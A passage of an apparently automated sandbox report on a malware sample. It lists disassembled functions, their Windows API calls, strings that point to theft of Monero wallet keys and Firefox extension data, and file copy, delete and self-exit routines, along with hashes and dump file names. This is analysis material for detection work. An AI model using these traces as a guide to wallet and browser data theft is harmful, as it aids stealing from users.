                                          • Opcode Fuzzy Hash: 9afff9c1a3a62e2409a240382f6fad6facb2ab3d74db01f0fb25ac13050d3749
                                          • Instruction Fuzzy Hash: 8341EB7150475C9EDB258B24CC85FFB7BECAF4A708F2454E8E586AA182D271BA44CF60
                                          Function 00EA6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EA6663
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA6726
                                          • ExitProcess.KERNEL32 ref: 00EA6755
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                          • String ID: <
                                          • API String ID: 1148417306-4251816714
                                          • Opcode ID: 77b68f898a8fc6e656020c370dfdd85448ed4be38232ddbaaa6abdcd4860fa69
                                          • Instruction ID: 85a876ec5a72179cea7aa4bb27e39bf90a614b4521b734681db2b28296fb3553
                                          • Opcode Fuzzy Hash: 77b68f898a8fc6e656020c370dfdd85448ed4be38232ddbaaa6abdcd4860fa69
                                          • Instruction Fuzzy Hash: A1312BB1D01218AADB54EB90DD86BDE77B8AF48300F405199F20A7B191DF787B48CF65
                                          Function 00EA87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EB0E28,00000000,?), ref: 00EA882F
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA8836
                                          • wsprintfA.USER32 ref: 00EA8850
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                                          • String ID: %dx%d
                                          • API String ID: 1695172769-2206825331
                                          • Opcode ID: ecb69728db947366442acdf1a2a120defce4be8e7b2d79855440b5c2cf1d4dc9
                                          • Instruction ID: e45c20e06643075303e93f44cfd089d96df57d9b65b0dfc8979c2aadd17b7557
                                          • Opcode Fuzzy Hash: ecb69728db947366442acdf1a2a120defce4be8e7b2d79855440b5c2cf1d4dc9
                                          • Instruction Fuzzy Hash: A4212EB1B41204EFDB14DF94DD45FAEBBB8FB48711F104119FA05A7284C77AA9008BA0
                                          Function 00EA8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EA951E,00000000), ref: 00EA8D5B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA8D62
                                          • wsprintfW.USER32 ref: 00EA8D78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesswsprintf
                                          • String ID: %hs
                                          • API String ID: 769748085-2783943728
                                          • Opcode ID: 69367c7e0736406dea179855e02288d85ecdde53dce4210159f84d4a7a44b35d
                                          • Instruction ID: 3538b1e1684e2571b658d9273760eaed03c54ec9ba7b38ff0087a0656c6efea8
                                          • Opcode Fuzzy Hash: 69367c7e0736406dea179855e02288d85ecdde53dce4210159f84d4a7a44b35d
                                          • Instruction Fuzzy Hash: FFE08CB0B41208FBC720DF94DC0AE6A77B8EB44702F000094FD4A97280DA76AE008BA1
                                          Function 00E9A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9A2E1
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00E9A3FF
                                          • lstrlen.KERNEL32(00000000), ref: 00E9A6BC
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9A743
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: cbd55048c0a8b4cbfe2faa5ad76bcf04a9932f9981eafe4b774513966e95b7f6
                                          • Instruction ID: 5f20a23e0f1d161b375cccc4d5486456969f394b6531ed2eba3c1f2c9fd6f062
                                          • Opcode Fuzzy Hash: cbd55048c0a8b4cbfe2faa5ad76bcf04a9932f9981eafe4b774513966e95b7f6
                                          • Instruction Fuzzy Hash: A9E152729102089BCB58FBA4DC96EEE7378AF59300F559179F4137A091EF347A09CB62
                                          Function 00E9D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9D481
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D698
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D6AC
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9D72B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: e2e616bf07861d9f8e317420cb3db014fbb05f48dd9cd1fc5d9e9ca4a3c874e6
                                          • Instruction ID: b0bcac7055135ddf940f28f48976b0a1903aff3f8357059fe7ee46ee0239d15e
                                          • Opcode Fuzzy Hash: e2e616bf07861d9f8e317420cb3db014fbb05f48dd9cd1fc5d9e9ca4a3c874e6
                                          • Instruction Fuzzy Hash: B99124729102049BCB58FBA0DC96EEE73B8AF59300F555179F5077A091EF387A09CB62
                                          Function 00E9D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9D801
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D99F
                                          • lstrlen.KERNEL32(00000000), ref: 00E9D9B3
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9DA32
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: dd8e5050beaf2609442c27ef8b6a550e7e696857118961bd31a0d2552c2a686c
                                          • Instruction ID: 686bd3a3671092e26ca8195145f35afca58412296f4cfaffe18e2a296db81ecb
                                          • Opcode Fuzzy Hash: dd8e5050beaf2609442c27ef8b6a550e7e696857118961bd31a0d2552c2a686c
                                          • Instruction Fuzzy Hash: AF8113729102049BCB48FBA4DC56EEE73B8AF59300F455139F407BA091EF387A09CB62
                                          Function 00E9F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EB1580,00EB0D92), ref: 00E9F54C
                                          • lstrlen.KERNEL32(00000000), ref: 00E9F56B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                          • API String ID: 998311485-3310892237
                                          • Opcode ID: 9a656b6e487cdfb08c2b7c1b085f14f9aecc3c9597e4a6951c23c6bc82de7fdf
                                          • Instruction ID: 634ee7da492e00618b2a246be5f60b875638806706a1b2b23c3136c8b25f4886
                                          • Opcode Fuzzy Hash: 9a656b6e487cdfb08c2b7c1b085f14f9aecc3c9597e4a6951c23c6bc82de7fdf
                                          • Instruction Fuzzy Hash: 5B511272D102089ADB48FBA0DC56DEE73B8AF59300F459539F4167B191EF347A09CBA2
                                          Function 00EA70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                          • API String ID: 3722407311-3520659465
                                          • Opcode ID: b34bd6e6045d61e72759808cd50b4620a619d2a0c778701f1632d84004de52a7
                                          • Instruction ID: f3204ff6ffcb052ea8e890ae9f07b48fd39974b06f856d6f5586d46f864bd8a1
                                          • Opcode Fuzzy Hash: b34bd6e6045d61e72759808cd50b4620a619d2a0c778701f1632d84004de52a7
                                          • Instruction Fuzzy Hash: 275171B0D042189BDB24EB90DC85BEEB7B4AF59304F1461A8E1557B181EB747E88CF64
                                          Function 00EA3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
